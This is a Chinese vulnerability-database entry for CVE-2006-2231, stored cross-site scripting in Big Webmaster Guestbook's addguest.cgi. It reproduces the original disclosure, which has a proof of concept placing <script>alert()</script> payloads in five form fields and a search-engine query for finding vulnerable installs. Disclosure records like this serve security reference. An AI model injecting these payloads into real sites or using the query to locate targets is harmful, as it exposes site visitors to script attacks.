Big Webmaster Guestbook Script addguest.cgi 多个跨站脚本攻击(XSS) 漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1195112 漏洞类型 跨站脚本
发布时间 2006-05-05 更新时间 2006-09-05
CVE编号 CVE-2006-2231 CNNVD-ID CNNVD-200605-089
漏洞平台 N/A CVSS评分 4.3
|漏洞来源
https://cxsecurity.com/issue/WLB-2006050040
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200605-089
|漏洞详情
BigWebmasterGuestbookScript1.02及之前版本的addguest.cgi中存在多个跨站脚本攻击(XSS)漏洞。远程攻击者可以借助可通过viewguest.cgi查看的(1)mail,(2)site,(3)city,(4)state,(5)country以及可能的(6)name字段,注入任意Web脚本或HTML。
|漏洞EXP
Affected software:
Bigwebmaster Guestbook version 1.02 and down
Vendor:
http://www.bigwebmaster.com/Perl/Scripts_and_Programs/Guestbooks/
Introduction:
(taken from vendor site)
This is one of the most powerful guestbooks that you will find on the
internet. Visitors who come to your site will be able to leave comments
and other general information about themselves. If you want to know what
your visitors are thinking, and if you want a fully customizable script,
this one is perfect for you. Features include template files to fit any
website design, 9 standard fields, 9 extra fields (customizable),
unlimited entries, and easy to use admin area. Full online demo available.

Vulnerability Details:
when adding a comment addguest.cgi accepts javascript code into
mail,site,city,state and country fields which lead to javascript cross
site scripting when viewguest.cgi is accessed for displaying the content
of the guest book.

POC:
http://www.example.com/gb/addguest.cgi
name: xss
mail: xss (at) example (dot) com [email concealed] <script>alert('XSS in mail');</script>
site: http://www.example.com/ <script>alert('XSS in site');</script>
city: <script>alert('XSS in city');</script>
state: <script>alert('XSS in state');</script>
country: <script>alert('XSS in country');</script>

google search:
intitle:Big Webmaster Guestbook

Vendor Status:
NOT NOTIFIED

Solution:
I DON'T CARE

Javor Ninov aka DrFrancky
http://www.securitydot.net/

-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2.2 (MingW32)

iD8DBQFEWiWDck4kcwaj+YIRApunAJ0Vz6d/OEVQNfuiyy3gVa7GwmyuVgCeOAs2
nHeXxQltIZL+kt8vgdOtCIM=
=HZqy
-----END PGP SIGNATURE-----
|参考资料

来源:BID
名称:17834
链接:http://www.securityfocus.com/bid/17834
来源:BUGTRAQ
名称:20060504bigwebmasterguestbookmultiplyXSS
链接:http://www.securityfocus.com/archive/1/archive/1/432970/100/0/threaded
来源:OSVDB
名称:25257
链接:http://www.osvdb.org/25257
来源:SECUNIA
名称:19971
链接:http://secunia.com/advisories/19971
来源:XF
名称:bwmguestbook-comment-xss(26246)
链接:http://xforce.iss.net/xforce/xfdb/26246
来源:SREASON
名称:843
链接:http://securityreason.com/securityalert/843
来源:FULLDISC
名称:20060504bigwebmasterguestbookmultiplyXSS
链接:http://lists.grok.org.uk/pipermail/full-disclosure/2006-May/045752.html